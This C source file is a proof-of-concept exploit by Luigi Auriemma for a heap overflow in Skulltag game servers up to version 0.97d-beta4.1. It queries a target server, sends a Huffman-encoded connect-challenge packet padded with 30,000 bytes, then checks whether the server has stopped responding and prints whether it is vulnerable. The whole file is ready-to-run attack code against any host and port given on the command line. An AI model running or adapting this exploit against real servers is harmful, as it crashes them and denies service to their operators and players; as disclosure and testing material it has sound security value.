/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "sv_huffman.c"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER                 "0.1"
#define PORT                10666
#define BUFFSZ              0x20000 // the same size used by Skulltag!
#define TWAIT               5

#define	CONNECT_CHALLENGE   200
#define	CONNECT_READY       201
#define	CONNECT_GETDATA     202
#define	CONNECT_QUIT        203
#define SVINFO              199
#define NETWORK_ERROR       254



u8 *skulltag_info(u8 *p);
void delimit(u8 *data);
int myset(u8 *dst, int chr, int len);
int mycpy(u8 *dst, u8 *src);
int doom_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int sec);
u32 resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    int     sd,
            len;
    u16     port = PORT;
    u8      *buff,
            *ver,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Skulltag <= 0.97d-beta4.1 heap overflow " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port    = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();
    HuffInit();

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- query server:\n");
    p = buff;
    p += putxx(p, SVINFO,     32);
    p += putxx(p, 0x001f7fff, 32);
    p += putxx(p, time(NULL), 32);
    len = doom_send_recv(sd, buff, p - buff, buff, BUFFSZ, 1);
    if(len > 4) ver = skulltag_info(buff);

    printf("- send malformed packet:\n");
    p = buff;
    *p++ = CONNECT_CHALLENGE;
    p   += myset(p, '0', 30000);
    p   += mycpy(p, "");
    *p++ = 0;
    *p++ = 0;
    len = doom_send_recv(sd, buff, p - buff, buff, BUFFSZ, 0);

    printf("- wait some seconds\n");
    sleep(ONESEC * 3);

    printf("- check server:\n");
    p = buff;
    p += putxx(p, SVINFO,     32);
    p += putxx(p, 0x001f7fff, 32);
    p += putxx(p, time(NULL), 32);
    len = doom_send_recv(sd, buff, p - buff, buff, BUFFSZ, 0);
    if(len < 0) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }

    close(sd);
    free(buff);
    return(0);
}



u8 *skulltag_info(u8 *p) {
    u32     dunno;
    int     i,
            wadnum;
    u8      *ver;

    printf("\n");
    getxx(p, &dunno, 32);                                       p += 4;
    getxx(p, &dunno, 32);                                       p += 4;
    ver   = strdup(p);
    printf("  version        %s\n", p);                         p += strlen(p) + 1;
    /* ID */                                                    p += 4;
    printf("  hostname       %s\n", p);                         p += strlen(p) + 1;
    printf("  wad URL        %s\n", p);                         p += strlen(p) + 1;
    printf("  e-mail         %s\n", p);                         p += strlen(p) + 1;
    printf("  mapname        %s\n", p);                         p += strlen(p) + 1;
    printf("  max clients    %hhu\n", *p++);
    printf("  max players    %hhu\n", *p++);
    printf("  wads           ");
    wadnum = *p++;
    for(i = 0; i < wadnum; i++) {
        printf("%s ", p);                                       p += strlen(p) + 1;
    }
    printf("\n");                                               p += 2;
    printf("  gametype       %hhu\n", *p++);
    printf("  gamename       %s\n", p);                         p += strlen(p) + 1;
    printf("  iwad           %s\n", p);                         p += strlen(p) + 1;
    printf("  password       %hhu\n", *p++);
    printf("  join password  %hhu\n", *p++);
    printf("  gameskill      %hhu\n", *p++);
    printf("  botskill       %hhu\n", *p++);
    /* the rest is useless */
    return(ver);
}



void delimit(u8 *data) {
    while(*data && (*data != '\n') && (*data != '\r')) data++;
    *data = 0;
}



int myset(u8 *dst, int chr, int len) {
    memset(dst, chr, len);
    return(len);
}



int mycpy(u8 *dst, u8 *src) {
    u8      *p;

    for(p = dst; *src; src++, p++) {
        *p = *src;
    }
    *p++ = 0;
    return(p - dst);
}



int doom_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err) {
    int     len;
    static u8   *buff = NULL;

    if(!buff) {
        buff = malloc(BUFFSZ);
        if(!buff) std_err();
    }

    HuffEncode(in, buff, insz, &len);
    len = send_recv(sd, buff, len, out ? buff : NULL, BUFFSZ, err);
    if(len > 0) HuffDecode(buff, out, len, &len);
    return(len);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        return(0);

    } else if(in) {
        for(retry = 2; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }

    } else {
        if(timeout(sd, 2) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }

    return(bytes);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


